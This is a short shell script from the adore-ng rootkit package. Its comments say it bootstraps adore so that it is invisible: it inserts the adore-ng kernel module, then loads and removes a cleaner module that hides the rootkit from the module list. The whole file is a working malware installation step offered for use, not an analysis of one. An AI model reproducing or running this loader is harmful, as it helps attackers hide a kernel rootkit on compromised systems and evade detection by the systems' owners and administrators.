#!/bin/sh

# Use this script to bootstrap adore!
# It will make adore invisible. You could also
# insmod adore without $0 but then its visible.

insmod ./adore-ng.o
insmod ./cleaner.o
rmmod cleaner


